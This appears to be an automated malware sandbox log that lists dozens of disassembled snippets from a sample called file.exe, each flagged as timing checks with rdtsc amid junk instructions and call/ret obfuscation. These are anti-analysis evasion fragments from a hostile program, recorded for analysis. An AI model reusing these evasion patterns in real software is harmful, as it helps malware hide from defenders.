Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4237F second address: A423AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D20FDh] 0x00000011 push 00000000h 0x00000013 adc esi, 5BBD80A2h 0x00000019 call 00007F0E6551CA39h 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A423AB second address: A423ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F0E647B607Ch 0x00000012 jng 00007F0E647B6076h 0x00000018 jmp 00007F0E647B607Bh 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E647B6081h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A423ED second address: A42400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jo 00007F0E6551CA54h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42400 second address: A42404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42404 second address: A4242F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E6551CA3Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4242F second address: A42439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0E647B6076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42439 second address: A424C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0E6551CA38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 pushad 0x00000024 or dword ptr [ebp+122D35D6h], esi 0x0000002a add dword ptr [ebp+122D35A6h], eax 0x00000030 popad 0x00000031 push 00000003h 0x00000033 mov di, cx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0E6551CA38h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jmp 00007F0E6551CA47h 0x00000057 push 00000003h 0x00000059 mov esi, dword ptr [ebp+122D2AA8h] 0x0000005f call 00007F0E6551CA39h 0x00000064 pushad 0x00000065 push esi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A424C7 second address: A424D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A424D0 second address: A424D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A424D4 second address: A424D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A424D8 second address: A42543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0E6551CA3Eh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jc 00007F0E6551CA42h 0x00000017 jg 00007F0E6551CA3Ch 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jns 00007F0E6551CA38h 0x00000026 jnc 00007F0E6551CA3Ch 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007F0E6551CA3Dh 0x00000036 pop eax 0x00000037 pushad 0x00000038 adc ch, FFFFFFF9h 0x0000003b mov esi, ebx 0x0000003d popad 0x0000003e lea ebx, dword ptr [ebp+1245728Ch] 0x00000044 mov esi, eax 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42543 second address: A4254C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4254C second address: A4256B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E6551CA36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E6551CA40h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A425BC second address: A425C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A425C1 second address: A425D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0E6551CA36h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A425D4 second address: A425EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B6082h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A425EA second address: A4262C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F0E6551CA3Ah 0x00000012 push 00000000h 0x00000014 jmp 00007F0E6551CA43h 0x00000019 push 0CE451C5h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0E6551CA3Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4276F second address: A427A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, esi 0x0000000b push 00000000h 0x0000000d jng 00007F0E647B607Ch 0x00000013 call 00007F0E647B6079h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0E647B6084h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A427A7 second address: A427AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A427AD second address: A427B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A427B1 second address: A42803 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E6551CA3Fh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0E6551CA48h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F0E6551CA43h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42803 second address: A42807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A54292 second address: A54297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60754 second address: A60758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60758 second address: A6075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6075E second address: A60773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E647B607Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60773 second address: A607A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA40h 0x00000007 jo 00007F0E6551CA36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E6551CA41h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A608F3 second address: A608FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60A41 second address: A60A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA3Fh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60A5C second address: A60A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60A62 second address: A60A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60BD7 second address: A60BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60BDF second address: A60BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0E6551CA36h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60D56 second address: A60D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60D5A second address: A60D64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60D64 second address: A60D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60D6B second address: A60D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A58FE9 second address: A58FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A58FED second address: A58FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A617BC second address: A617C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A617C0 second address: A617EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E6551CA3Bh 0x0000000d jmp 00007F0E6551CA47h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61D92 second address: A61DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F0E647B607Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61DA3 second address: A61DAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61EFD second address: A61F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Ch 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007F0E647B607Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61F24 second address: A61F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62094 second address: A620A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6225A second address: A62260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62260 second address: A62264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62572 second address: A625B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F0E6551CA36h 0x0000000b popad 0x0000000c jmp 00007F0E6551CA43h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F0E6551CA42h 0x00000019 push ecx 0x0000001a jmp 00007F0E6551CA3Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A652A5 second address: A652AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E647B6076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A653EC second address: A653F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A653F0 second address: A6541F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F0E647B607Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A63C2D second address: A63C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A63C33 second address: A63C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A667AF second address: A667B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A667B3 second address: A667BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E647B6076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A667BF second address: A667E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0E6551CA36h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CE16 second address: A6CE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D3B8 second address: A6D3C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D3C0 second address: A6D3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D3C6 second address: A6D3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6EF8D second address: A6EF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F4C3 second address: A6F4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F4C7 second address: A6F4CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F5A0 second address: A6F5B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0E6551CA36h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F5B3 second address: A6F5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F5BB second address: A6F5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6FB72 second address: A6FB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7169E second address: A716F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E6551CA38h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0E6551CA38h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jmp 00007F0E6551CA44h 0x00000030 push 00000000h 0x00000032 cld 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jne 00007F0E6551CA36h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70D98 second address: A70D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72EC9 second address: A72F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 je 00007F0E6551CA38h 0x0000000c mov edi, esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0E6551CA38h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push ecx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f adc di, 05DDh 0x00000034 pop edi 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72F0E second address: A72F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6081h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72BE7 second address: A72BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72BED second address: A72BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76505 second address: A7651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7651E second address: A76523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7632D second address: A76331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76523 second address: A76529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76529 second address: A76571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 or dword ptr [ebp+122D3256h], ecx 0x0000000e push 00000000h 0x00000010 add esi, 10F38BB1h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F0E6551CA38h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 or edi, dword ptr [ebp+122D35C7h] 0x00000038 mov edi, dword ptr [ebp+1245868Eh] 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 push edi 0x00000043 pop edi 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76DF1 second address: A76DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BAA5 second address: A7BAAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7DFB6 second address: A7DFDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B6080h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E1CD second address: A7E1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E1D3 second address: A7E1D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F29E second address: A7F2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A82334 second address: A8235F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0E647B6087h 0x0000000f jl 00007F0E647B6076h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A833BA second address: A833BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85183 second address: A8518B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
